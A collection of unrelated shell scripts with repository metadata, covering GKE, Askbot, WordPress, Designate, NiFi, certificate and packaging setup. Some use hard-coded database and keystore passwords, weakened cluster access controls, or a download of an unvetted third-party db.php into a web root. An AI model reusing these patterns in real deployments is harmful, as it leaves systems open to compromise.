1. Match genome/mRNA/rRNA/tRNA/IGR/AS/ statement.
2. sRNA output.
3. Draw figures: match mRNA/rRNA/tRNA...
| true
|
7402794500c0abfd361f088e6c900d098204be2d
|
Shell
|
shudhanshh/gcp-terraform-infra
|
/xyz-Dev-Project/create-cluster.sh
|
UTF-8
| 2,388
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Create cluster zonal cluster in standard mode with premptible node in us-east1-a zone with two node pools
# One node pool is default and the other one with premptible vm
# Used below gcloud command which will create a new cluster

#Setting environment variable
PROJECT_ID="xyz-dev-freelance"
ENV="dev"
REGION="us-east1"
ZONE="us-east1-b"
PREFIX="xyz"
CLUSTER_NAME="${PREFIX}-${ENV}-cluster"
MACHINE_TYPE="n2-standard-2"
NETWORK="default"

echo "$PROJECT_ID"
echo "$ENV"
echo "$REGION"
echo "$ZONE"
echo "$PREFIX"
echo "$CLUSTER_NAME"
echo "$MACHINE_TYPE"
echo "$NETWORK"

gcloud config set project "$PROJECT_ID"
gcloud config set compute/region "$REGION"

# The --network/--subnetwork paths are now built from the variables above
# (the original re-hardcoded the project id and network name, defeating
# the point of declaring them — NETWORK was declared but never used).
gcloud beta container --project "$PROJECT_ID" clusters create "$CLUSTER_NAME" \
--zone "$ZONE" --no-enable-basic-auth --cluster-version "1.19.9-gke.1400" --release-channel "regular" \
--machine-type "$MACHINE_TYPE" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" \
--metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/cloud-platform" \
--preemptible --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias \
--network "projects/${PROJECT_ID}/global/networks/${NETWORK}" \
--subnetwork "projects/${PROJECT_ID}/regions/${REGION}/subnetworks/${NETWORK}" \
--no-enable-intra-node-visibility --default-max-pods-per-node "110" --enable-autoscaling \
--min-nodes "3" --max-nodes "6" --no-enable-master-authorized-networks \
--enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 \
--enable-autoprovisioning --min-cpu 1 --max-cpu 1 --min-memory 1 --max-memory 1 \
--autoprovisioning-scopes=https://www.googleapis.com/auth/cloud-platform --enable-autoprovisioning-autorepair \
--enable-autoprovisioning-autoupgrade --autoprovisioning-max-surge-upgrade 1 --autoprovisioning-max-unavailable-upgrade 0 \
--node-locations "$ZONE" && gcloud beta container \
--project "$PROJECT_ID" node-pools create "default-node-pool" \
--cluster "$CLUSTER_NAME" --zone "$ZONE" --machine-type "$MACHINE_TYPE" \
--image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" \
--metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/cloud-platform" \
--num-nodes "1" --enable-autoscaling --min-nodes "1" --max-nodes "1" --enable-autoupgrade \
--enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --node-locations "$ZONE"
| true
|
b0ca21acadc1efbfe4fa32e9bf7efc3811726272
|
Shell
|
NSOPORTEDESARROLLO/nstools
|
/files/nstools/bin/cat_samba4
|
UTF-8
| 435
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/bash
# Samba4 (Active Directory) submenu for nstools: shows the category menu
# and re-execs itself (or the main menu) after each choice.
NSTOOLS_PATH="/opt/nstools"
# On Ctrl-C, redisplay this menu instead of leaving a half-drawn screen.
trap "exec $NSTOOLS_PATH/bin/cat_samba4" SIGINT
clear
. /opt/nstools/lib/header
echo "SAMBA4 (Active Directory) - Seleccione una opcion:
[1] - Usuarios
[2] - Grupos
[3] - Recursos Compartidos
[4] - Configuraciones Avanzadas
[r] - Regresar
"
# -r keeps backslashes literal; quoting the case word guards odd input.
read -r OPT
case "$OPT" in
	r)
		exec $NSTOOLS_PATH/bin/nstools_start
		;;
	*)
		exec $NSTOOLS_PATH/bin/cat_samba4
		;;
esac
| true
|
05ec3970a5a5847ce0580b0c3830dd03d4349b78
|
Shell
|
Fellepp/CloudComputing
|
/Task3/vectorSum/gpu_job.sh
|
UTF-8
| 754
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/sh
##
## Name of the job that will be created
##
#PBS -N gpu_job
##
## Queue the job will be submitted to
##
#PBS -q batch
##
## Execution must be requested on one of the nodes with GPUs installed
##
#PBS -l nodes=verode10
##
## Maximum wall-clock time for the job. The format is HH:MM:SS.
##
#PBS -l walltime=01:00:00
##
## Both standard output and standard error are written to files
##
#PBS -k oe

# Compiled-kernel caching must be disabled: the cache lives in
# ~/.nv/ComputeCache/, which sits on NFS and breaks due to file locking.
export CUDA_CACHE_DISABLE=1

# The absolute path to the program to execute must be given
~/CUDA/vectorSum/vectorSum_gpu
~/CUDA/vectorSum/vectorSum_gpu_long
| true
|
c7c589338e229834ea818eef32e2f504542e7496
|
Shell
|
xnandor/cees
|
/volumes/host/askbot.sh
|
UTF-8
| 4,490
| 3.078125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Docker entrypoint helper for Askbot: installs PostgreSQL client
# dependencies, waits for the database container, then (further down)
# patches the app settings before handing control to the app.
set -e

##################OPTIONAL INPUT PARAMETERS VIA ENVIRONMENT
# ASKBOT_ROOT
# ASKBOT_DB_HOST
# ASKBOT_DB_PORT
# ASKBOT_DB_TYPE
# ASKBOT_DB_USERNAME
# ASKBOT_DB_PASSWORD

apt-get --assume-yes update
# apt-get --assume-yes install python-mysqldb
# apt-get --assume-yes install binutils libproj-dev gdal-bin
# apt-get --assume-yes install python-pip python-dev libpq-dev postgresql postgresql-contrib
# apt-get --assume-yes install postgresql postgresql-contrib
apt-get --assume-yes install libpq-dev
apt-get --assume-yes install python-psycopg2
# pip install psycopg2

# Block until the Postgres container accepts connections.
/host/wait-for-it.sh askbot-postgres-db:5432;

# Defaults; each can be overridden by the ASKBOT_* variables listed above.
ROOT='askbot/';
DB_HOST='db'
DB_PORT='5432'
DB_TYPE='postgresql_psycopg2'
DB_USERNAME='postgres';
DB_PASSWORD='password';
# Copy any ASKBOT_* override from the environment onto the matching global.
# Unset or empty variables leave the default in place.
#
# Globals read:    ASKBOT_ROOT, ASKBOT_DB_HOST, ASKBOT_DB_PORT,
#                  ASKBOT_DB_TYPE, ASKBOT_DB_USERNAME, ASKBOT_DB_PASSWORD
# Globals written: ROOT, DB_HOST, DB_PORT, DB_TYPE, DB_USERNAME, DB_PASSWORD
#
# Bug fixed: the original tested `[ -n $SETTING ]`; with an unset variable
# that collapses to the one-argument form `[ -n ]`, which is always true,
# so every default was clobbered with an empty string.
function settingsFromEnvironment() {
    ROOT=${ASKBOT_ROOT:-$ROOT}
    DB_HOST=${ASKBOT_DB_HOST:-$DB_HOST}
    DB_PORT=${ASKBOT_DB_PORT:-$DB_PORT}
    DB_TYPE=${ASKBOT_DB_TYPE:-$DB_TYPE}
    DB_USERNAME=${ASKBOT_DB_USERNAME:-$DB_USERNAME}
    DB_PASSWORD=${ASKBOT_DB_PASSWORD:-$DB_PASSWORD}
}
# Patch the Askbot settings.py and uWSGI deploy files in place so the app
# serves under the configured URL prefix and talks to the external database.
# Each stanza rewrites one setting via sed and logs the substitution.
# Reads the ROOT/DB_* globals (after applying environment overrides).
function changeSettings() {
    settingsFromEnvironment;
    # DEBUG
    # NOTE(review): SUB_OLD == SUB_NEW here, so this sed is a no-op —
    # confirm whether DEBUG was meant to be toggled.
    SUB_OLD="DEBUG = False"
    SUB_NEW="DEBUG = False"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # uWSGI IP
    SUB_OLD="0.0.0.0"
    SUB_NEW="askbot"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/uwsgi.ini
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # uWSGI STATIC MAP
    SUB_OLD="0.0.0.0"
    SUB_NEW="askbot"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/uwsgi.ini
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # uWSGI PROTO PORT
    SUB_OLD="bin/uwsgi "
    SUB_NEW="bin/uwsgi --socket :8888 "
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/run.sh
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # uWSGI MEDIA MAP
    SUB_OLD="/m="
    SUB_NEW="/askbot/m="
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/uwsgi.ini
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # ROOT
    SUB_OLD="ASKBOT_URL = ''"
    SUB_NEW="ASKBOT_URL = '$ROOT'"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # STATIC
    SUB_OLD="STATIC_URL = '/m/'"
    SUB_NEW="STATIC_URL = '/askbot/m/'"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # MEDIA
    SUB_OLD="MEDIA_URL = '/upfiles/'"
    SUB_NEW="MEDIA_URL = '/askbot/upfiles/'"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # NAME
    SUB_OLD="'NAME': '/data/askbot.db',"
    SUB_NEW="'NAME': 'askbot',"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # DB_HOST
    SUB_OLD="'HOST': ''"
    SUB_NEW="'HOST': '$DB_HOST'"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # DB_PORT
    SUB_OLD="'PORT': ''"
    SUB_NEW="'PORT': '$DB_PORT'"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # DB_TYPE
    SUB_OLD="'django.db.backends.sqlite3'"
    SUB_NEW="'django.db.backends.$DB_TYPE'"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # DB_USERNAME
    SUB_OLD="'USER': ''"
    SUB_NEW="'USER': '$DB_USERNAME'"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # DB_PASSWORD
    SUB_OLD="'PASSWORD': ''"
    SUB_NEW="'PASSWORD': '$DB_PASSWORD'"
    sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/settings.py
    echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
    # # DB SYNC
    # SUB_OLD="python /app/manage.py migrate --noinput"
    # SUB_NEW="python manage.py makemigrations askbot\npython /app/manage.py migrate --noinput"
    # sed -i "s|$SUB_OLD|$SUB_NEW|g" /app/deploy/run.sh
    # echo "Changed From: $SUB_OLD |||||| To: $SUB_NEW"
}
#### DO NO MATTER WHAT
# Always rewrite the settings files before handing off.
changeSettings;

#### NO CMD(s)
# No arguments: hand the process over to the stock deploy script via exec
# so it runs as PID 1 and receives container signals directly (the original
# launched it as a child, then fell through to `echo "Running ''"` and an
# empty exec once it exited).
if [ "$#" -eq 0 ]; then
	echo "Running /app/deploy/run.sh"
	exec /app/deploy/run.sh
fi

#### CMD(s)
echo "Running '$@'"
exec "$@"
| true
|
83f70813c2b06c424909052d8804ca0ea37720c6
|
Shell
|
manaphys/dest
|
/install.sh
|
UTF-8
| 2,087
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
# LAMP + WordPress bootstrap for Ubuntu.
# Based on: https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu
# NOTE(review): relative paths (etc/apache2/..., home/dest/...) assume the
# script is run from this repository's root directory - confirm before running.
#font: https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu
sudo apt-get update
#apache
sudo apt-get install apache2
sudo cp etc/apache2/apache2.conf /etc/apache2/apache2.conf
#apache test
##ifconfig eth0 | grep "inet " | awk '{ print $3 }'
##ifconfig eth1 | grep "inet " | awk '{ print $3 }'
#to change port, change this two files, and restart apache
##sudo vim /etc/apache2/ports.conf
##sudo vim /etc/apache2/sites-enabled/000-default.conf
#mysql
sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql
sudo mysql_install_db
sudo /usr/bin/mysql_secure_installation
#php
sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt
sudo cp etc/apache2/mods-enabled/dir.conf /etc/apache2/mods-enabled/
#php test
##sudo cp var/www/html/info.php /var/www/html/
sudo service apache2 restart
#wordpress
sudo apt-get install php5-gd libssh2-php
# NOTE(review): MySQL root password is hard-coded on the command line and
# visible in `ps` output while mysql runs.
mysql -uroot -psecret < home/dest/wordpress/wordpress-setup.sql
sudo cp home/dest/wordpress/wp-config.php /var/www/html
cd /tmp
wget http://wordpress.org/latest.tar.gz
tar xzvf latest.tar.gz
sudo rsync -avP /tmp/wordpress/ /var/www/html/
cd /var/www/html
sudo wget -c https://raw.githubusercontent.com/aidewind/aide/master/db.php
#do this guide to understand the demo user https://www.digitalocean.com/community/tutorials/initial-server-setup-with-ubuntu-14-04
##sudo chown -R demo:www-data *
mkdir /var/www/html/wp-content/uploads
sudo chown -R :www-data /var/www/html/wp-content/uploads
#open browser to finish up! or... =^)
##mysql -uroot -psecret < home/dest/wordpress/wordpress.sql
#to do : enable more cool permanlinks
##http://codex.wordpress.org/Changing_File_Permissions
##https://www.digitalocean.com/community/tutorials/how-to-set-up-mod_rewrite
#govpress theme
cd /var/www/html/wp-content/themes
wget -c https://downloads.wordpress.org/theme/govpress.1.3.0.zip
unzip govpress.1.3.0.zip
| true
|
8851ef5959c0ad75d591b4dec95b62ee95493120
|
Shell
|
mattt416/rpc-designate
|
/scripts/deploy.sh
|
UTF-8
| 2,038
| 2.890625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright 2014-2017, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Deploys the Designate (DNSaaS) service on top of an rpc-openstack
# installation: creates containers, installs designate, wires it into
# haproxy, opens mdns firewall ports and enables filebeat logging.

## Shell Opts ----------------------------------------------------------------

set -e -u -x
set -o pipefail

export BASE_DIR=${BASE_DIR:-"/opt/rpc-openstack"}

# Provides the run_ansible helper used throughout this script.
source ${BASE_DIR}/scripts/functions.sh

# Extra -e overrides passed to every designate-related playbook run.
export DESIGNATE_DEPLOY_OPS="-e @/opt/rpc-designate/playbooks/group_vars/designate_all.yml "

# Perform peliminary configurations for Designate
run_ansible /opt/rpc-designate/playbooks/setup-designate.yml

# ReBootstrap ansible to add the os_designate role to ansible
${BASE_DIR}/scripts/bootstrap-ansible.sh

cd /opt/rpc-openstack/openstack-ansible/playbooks/

# build container
run_ansible lxc-containers-create.yml --limit designate_all

run_ansible openstack-hosts-setup.yml --tags openstack_hosts-config

# NOTE: DEPLOY_AIO must be set in the environment (set -u above), "yes"
# selects the all-in-one path with a local bind server and AIO pools file.
if [[ "${DEPLOY_AIO}" == "yes" ]]; then
  run_ansible /opt/rpc-designate/playbooks/setup-bind.yml
  export DESIGNATE_DEPLOY_OPS=${DESIGNATE_DEPLOY_OPS}"-e @/opt/rpc-designate/playbooks/files/aio/pools.yml.aio "
fi

# install designate
run_ansible ${DESIGNATE_DEPLOY_OPS} -e "designate_developer_mode=True" /opt/rpc-designate/playbooks/os-designate-install.yml

# add service to haproxy
run_ansible ${DESIGNATE_DEPLOY_OPS} haproxy-install.yml

# open ports for designate-mdns
run_ansible ${DESIGNATE_DEPLOY_OPS} /opt/rpc-designate/playbooks/setup-infra-firewall-mdns.yml

# add filebeat to service so we get logging
cd /opt/rpc-openstack/
run_ansible /opt/rpc-openstack/rpcd/playbooks/filebeat.yml --limit designate_all
| true
|
8ee8a6c5089d4a5f8680d740e1d78fbfb11b0e0c
|
Shell
|
kunihal96/asement
|
/flipcoin.sh
|
UTF-8
| 1,052
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash -x
# Simulate 10 coin flips and report how many heads/tails came up.
# On a tie, keep flipping ("sudden death") until one side leads by
# exactly 2, then report the final counts.

head=1          # RANDOM%2 value that counts as "heads"
tail=0          # RANDOM%2 value that counts as "tails"
headcount=0
tailcount=0

# flip_once: flip a single coin, print the outcome and bump the
# matching counter.
flip_once() {
    local check=$((RANDOM % 2))
    if (( check == head )); then
        echo "got head"
        ((headcount++))
    else
        echo "got tail"
        ((tailcount++))
    fi
}

for (( i = 0; i < 10; i++ )); do
    flip_once
done

echo "head count: $headcount"
echo "tail count: $tailcount"
echo " "

if (( headcount > tailcount )); then
    diff=$((headcount - tailcount))
    # fixed typo: "diffrence" -> "difference"
    echo "difference is $diff for winning head"
elif (( headcount < tailcount )); then
    diff=$((tailcount - headcount))
    echo "difference is $diff for winning tail"
else
    echo "tie"
    # Sudden death: the difference changes by +-1 per flip, so it will
    # eventually hit exactly +-2, at which point we stop.
    while true; do
        flip_once
        if (( headcount - tailcount == 2 )) || (( tailcount - headcount == 2 )); then
            break
        fi
    done
    echo "head count: $headcount"
    echo "tail count: $tailcount"
fi
| true
|
2b2ef4407971b09292a2bd3f175253bc28236253
|
Shell
|
img/makecerts
|
/make_server_certs.sh
|
UTF-8
| 2,026
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Create and sign a server (device) certificate with a pre-existing
# private root CA, then package key+cert into a PKCS#12 bundle and a
# Java keystore. Expects all/my-private-root-ca.{cert,privkey}.pem and
# openssl.cnf to exist; writes into all/, server/ and client/.

# Create a Device Certificate for each domain,
# such as example.com, *.example.com, awesome.example.com
# NOTE: You MUST match CN to the domain name or ip address you want to use
openssl genrsa \
  -out all/privkey.pem \
  2048

# Create a request from your Device, which your Root CA will sign
openssl req -new \
  -config openssl.cnf \
  -sha256 \
  -key all/privkey.pem \
  -out all/csr.pem

# Sign the request from Device with your Root CA
openssl x509 \
  -req -in all/csr.pem \
  -extfile openssl.cnf \
  -extensions v3_req \
  -sha256 \
  -CA all/my-private-root-ca.cert.pem \
  -CAkey all/my-private-root-ca.privkey.pem \
  -CAcreateserial \
  -out all/cert.pem \
  -days 365

# covert the server certificate to der
#openssl x509 -outform der -in all/cert.pem -out all/cert.der

# Put things in their proper place
cp all/{privkey,cert}.pem server/
cat all/cert.pem > server/fullchain.pem # we have no intermediates in this case
cp all/my-private-root-ca.cert.pem server/
cp all/my-private-root-ca.cert.pem client/

# create DER format crt for iOS Mobile Safari, etc
#openssl x509 -outform der -in all/my-private-root-ca.cert.pem -out client/my-private-root-ca.crt

# add the certificate and private key into a p12
# NOTE(review): export password "ibm-team" is hard-coded via -passout.
rm -f all/server.p12
openssl pkcs12 -export -in all/cert.pem -inkey all/privkey.pem -out all/ibm-team-ssl.p12 -name default -CAfile all/my-private-root-ca.cert.pem -caname root -passout pass:ibm-team

# needs to be oracle keytool - ibm one seems not to like this incantation
# NOTE(review): absolute cygwin JDK path below is machine-specific - adjust
# for the local JDK installation.
rm -f all/ibm-team-ssl.keystore
/cygdrive/c/Program\ Files/Java/jdk1.8.0_333/bin/keytool.exe -importkeystore -deststorepass ibm-team -destkeypass ibm-team -destkeystore all/ibm-team-ssl.keystore -srckeystore all/ibm-team-ssl.p12 -srcstoretype PKCS12 -srcstorepass ibm-team

#cp server/cert.pem /d/dev/gadget_server/certs/server/my-server.crt.pem
#cp server/privkey.pem /d/dev/gadget_server/certs/server/my-server.key.pem
#cp server/my-private-root-ca.cert.pem /d/dev/gadget_server/certs/ca/my-root-ca.crt.pem
| true
|
2e9a751576513353efb427606d115f8c7e76a118
|
Shell
|
scalableminds/time-tracker
|
/build/build.sh
|
UTF-8
| 3,463
| 3.984375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# CI build script: compiles the time-tracker Play application, lays out a
# root filesystem image under $ROOT_ENV, renders jinja2-based config
# templates, and packages everything into a .deb with fpm.
set -e

: ${BUILD_NUMBER:?"Need non empty BUILD_NUMBER variable! If you are starting this script from cli you should use build-cli.sh"}
: ${JOB_NAME:?"Need non empty JOB_NAME variable"}

SCRIPT_DIR=$(dirname $0)
export WORKSPACE=${WORKSPACE:-$(readlink -f ${SCRIPT_DIR}/..)}

# Abort early when jinja2 is missing.
# BUG FIX: the old check was `if [ $(python2 -c "import jinja2") ]`, which
# tested whether the command printed anything on stdout. A successful import
# prints nothing and a failed import writes its traceback to stderr, so the
# guard could never fire. Test the exit status instead.
if ! python2 -c "import jinja2" 2>/dev/null; then
  echo "This script needs jinja2 for template rendering, aborting ..."
  exit 1
fi

# The branch is taken from .git/REAL_BRANCH when present, otherwise from
# the GIT_BRANCH environment variable.
REAL_BRANCH_FILE=${WORKSPACE}/.git/REAL_BRANCH
if [ -f ${REAL_BRANCH_FILE} ]; then
  GIT_BRANCH=$(<${REAL_BRANCH_FILE})
elif [ -z "$GIT_BRANCH" ]; then
  echo "Need either a $REAL_BRANCH_FILE containing branch or GIT_BRANCH environment variable"
  exit 1
fi

export NAME=${JOB_NAME}-${GIT_BRANCH}
export ROOT_ENV=$WORKSPACE/root_env
export INSTALL_DIR=/usr/lib/$NAME
export PID_DIR=/var/run/$NAME
export LOG_DIR=/var/log/$NAME
export PORT=12000
export MODE=prod
export VERSION=1.0

# Compile the application and build the staged distribution.
stage() {
  echo "[*] compiling..."
  cd $WORKSPACE
  bower install
  sbt clean compile stage
}

# (Re)create an empty $ROOT_ENV directory to assemble the package in.
createRootEnvironment() {
  echo "[*] creating root environment..."
  cd $WORKSPACE
  if [ -d ${ROOT_ENV} ]; then
    rm -rf ${ROOT_ENV}
  elif [ -e ${ROOT_ENV} ]; then
    echo "Root Environment $ROOT_ENV exists, but is not a directory, aborting..."
    return 1
  fi
  mkdir ${ROOT_ENV}
}

# Copy the sbt staging output into $ROOT_ENV$INSTALL_DIR.
copyBinariesToRootEnvironment(){
  echo "[*] copying binary files..."
  INSTALL_DIR_PATH=${ROOT_ENV}${INSTALL_DIR}
  mkdir -p $INSTALL_DIR_PATH
  cp -r $WORKSPACE/target/universal/stage/* $INSTALL_DIR_PATH
}

# Render a single jinja2 template ($1) to stdout using the build variables.
renderTemplate() {
  TEMPLATE_CONTENT=$(< $1)
  python2 -c "import jinja2; print jinja2.Template(\"\"\"$TEMPLATE_CONTENT\"\"\").render(\
	  name=\"$NAME\", project=\"$JOB_NAME\", branch=\"$GIT_BRANCH\", mode=\"$MODE\", port=\"$PORT\", \
	  install_dir=\"$INSTALL_DIR\", pid_dir=\"$PID_DIR\", log_dir=\"$LOG_DIR\")"
}

makeInitScriptExecutable() {
  #A more general approach to setting modi on files could be a suffix such as ".x" for "add executable flag", so far it's not nesseccary though
  chmod +x $ROOT_ENV/etc/init.d/$NAME
  chmod +x ${ROOT_ENV}${INSTALL_DIR}/bin/time-tracker
}

# Render every file below build/templates into the same relative path in
# $ROOT_ENV; "-BRANCH" in file names is replaced by the actual branch.
renderAllTemplates() {
  TEMPLATES=$(find $WORKSPACE/build/templates -type f)
  while read -r TEMPLATE; do
    TEMPLATE_PATH=${TEMPLATE#*/templates/}
    TARGET_PATH=${TEMPLATE_PATH//-BRANCH/-$GIT_BRANCH}
    echo "[*] rendering template $TARGET_PATH"
    mkdir -p `dirname $ROOT_ENV/$TARGET_PATH`
    renderTemplate $TEMPLATE > $ROOT_ENV/$TARGET_PATH
  done <<< $TEMPLATES
}

# Package $ROOT_ENV into a versioned .deb via fpm, wiring in the
# install/remove hook scripts.
buildPackage() {
  echo "[*] creating package"
  DIRS=`ls -x $ROOT_ENV`
  INSTALL_SCRIPT_DIR=${WORKSPACE}/build/install_scripts
  cd $WORKSPACE
  fpm -m thomas@scm.io -s dir -t deb \
    -n ${NAME} \
    -v $VERSION \
    --iteration ${BUILD_NUMBER} \
    --before-install="${INSTALL_SCRIPT_DIR}/before-install.sh" \
    --before-remove="${INSTALL_SCRIPT_DIR}/before-remove.sh" \
    --after-remove="${INSTALL_SCRIPT_DIR}/after-remove.sh" \
    --deb-user root \
    --deb-group root \
    --template-scripts \
    --template-value name="${NAME}" \
    --template-value project="${JOB_NAME}" \
    --template-value branch="${GIT_BRANCH}" \
    --template-value mode="${MODE}" \
    --template-value install_dir="${INSTALL_DIR}" \
    --template-value pid_dir="${PID_DIR}" \
    --template-value log_dir="${LOG_DIR}" \
    -C ${ROOT_ENV} ${DIRS}
}

cleanUp() {
  echo "[*] cleaning up..."
  rm -rf $ROOT_ENV
}

stage
createRootEnvironment
copyBinariesToRootEnvironment
renderAllTemplates
makeInitScriptExecutable
buildPackage
cleanUp
| true
|
323d399b656a3516c809b3337f091b51fa2f1cfc
|
Shell
|
cashgithubs/NLPClass
|
/lab4/java/run~
|
UTF-8
| 1,109
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/sh
#
# You may find this shell script helpful.
#
# Copies the (large) sentiment dataset from NFS into /tmp on the local
# machine once, then runs the TrainTest class against the local copy so
# repeated runs do not hammer the NFS server.

tmp=/tmp
subdir=sentiment-data
data=/courses/nchamber/nlp/lab4/data

# These statements copy the data directory above to the local machine.
# The tweets are 100's of MBs, so we don't want our Java code
# constantly making NFS calls. Copy it all into /tmp/sentiment-data.
cpdata=$data
if [ -d $tmp ]; then
    # If our /tmp directory does not exist, create it and copy data.
    if [ ! -d $tmp/$subdir ]; then
	mkdir $tmp/$subdir
	chmod 777 $tmp/$subdir
        # If mkdir succeeded, copy data.
	if [ -d $tmp/$subdir ]; then
	    echo "Copying data to your local machine."
	    echo "This is a one-time operation. Please wait."
	    echo "We're saving the NFS for everyone!"
	    cpdata=$tmp/$subdir
	    cp -R $data/* $cpdata/
	    chmod -R a+r $cpdata
	fi
    fi
    # Set the /tmp path.
    # (If the copy above failed part-way, a later run still uses the
    # possibly incomplete /tmp copy - the directory existing is the only check.)
    if [ -d $tmp/$subdir ]; then
	cpdata=$tmp/$subdir
    fi
fi

# Run the program, forwarding any extra CLI arguments ($@) to TrainTest.
echo "Data directory: $cpdata"
java -mx1500m -cp classes usna.sentiment.TrainTest \
    -data $cpdata \
    $@
| true
|
e257b0d9a8781008f103ff7b6d3e4e12f69d52bb
|
Shell
|
sokangmin/wini-nifi
|
/docker/sh/start.sh
|
UTF-8
| 2,382
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh -e

#    Licensed to the Apache Software Foundation (ASF) under one or more
#    contributor license agreements.  See the NOTICE file distributed with
#    this work for additional information regarding copyright ownership.
#    The ASF licenses this file to You under the Apache License, Version 2.0
#    (the "License"); you may not use this file except in compliance with
#    the License.  You may obtain a copy of the License at
#
#       http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS,
#    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#    See the License for the specific language governing permissions and
#    limitations under the License.

# Container entrypoint: applies environment-driven configuration to the
# NiFi install and runs it in the foreground, streaming its app log so
# `docker logs` works. Helper functions (prop_replace, uncomment) and the
# nifi_bootstrap_file variable come from common.sh.

scripts_dir='/opt/nifi/scripts'

[ -f "${scripts_dir}/common.sh" ] && . "${scripts_dir}/common.sh"

# Override JVM memory settings
if [ -n "${NIFI_JVM_HEAP_INIT}" ]; then
    prop_replace 'java.arg.2' "-Xms${NIFI_JVM_HEAP_INIT}" ${nifi_bootstrap_file}
fi

if [ -n "${NIFI_JVM_HEAP_MAX}" ]; then
    prop_replace 'java.arg.3' "-Xmx${NIFI_JVM_HEAP_MAX}" ${nifi_bootstrap_file}
fi

if [ -n "${NIFI_JVM_DEBUGGER}" ]; then
    uncomment "java.arg.debug" ${nifi_bootstrap_file}
fi

# Establish baseline properties
prop_replace 'nifi.web.https.host'      "${NIFI_WEB_HTTPS_HOST:-$HOSTNAME}"

if [ -n "${SINGLE_USER_CREDENTIALS_USERNAME}" ] && [ -n "${SINGLE_USER_CREDENTIALS_PASSWORD}" ]; then
    ${NIFI_HOME}/bin/nifi.sh set-single-user-credentials "${SINGLE_USER_CREDENTIALS_USERNAME}" "${SINGLE_USER_CREDENTIALS_PASSWORD}"
fi

# Check if the user has specified a nifi.web.proxy.host setting and handle appropriately
if [ -z "${NIFI_WEB_PROXY_HOST}" ]; then
    echo 'NIFI_WEB_PROXY_HOST was not set but NiFi is configured to run in a secure mode. The NiFi UI may be inaccessible if using port mapping.'
else
    prop_replace 'nifi.web.proxy.host' "${NIFI_WEB_PROXY_HOST}"
fi

# Continuously provide logs so that 'docker logs' can produce them
"${NIFI_HOME}/bin/nifi.sh" run &
nifi_pid="$!"
tail -F --pid=${nifi_pid} "${NIFI_HOME}/logs/nifi-app.log" &

# BUG FIX: the stop command previously used the relative path ./bin/nifi.sh,
# which only works when the current directory happens to be NIFI_HOME.
# Use the absolute path like every other invocation in this script.
trap 'echo Received trapped signal, beginning shutdown...;"${NIFI_HOME}/bin/nifi.sh" stop;exit 0;' TERM HUP INT;
trap ":" EXIT

echo NiFi running with PID ${nifi_pid}.
wait ${nifi_pid}
| true
|
15a029bd707a12cee8873ea8b8ba7787322e1f70
|
Shell
|
TheArqsz/auto-ssh-key
|
/auto-ssh-key.sh
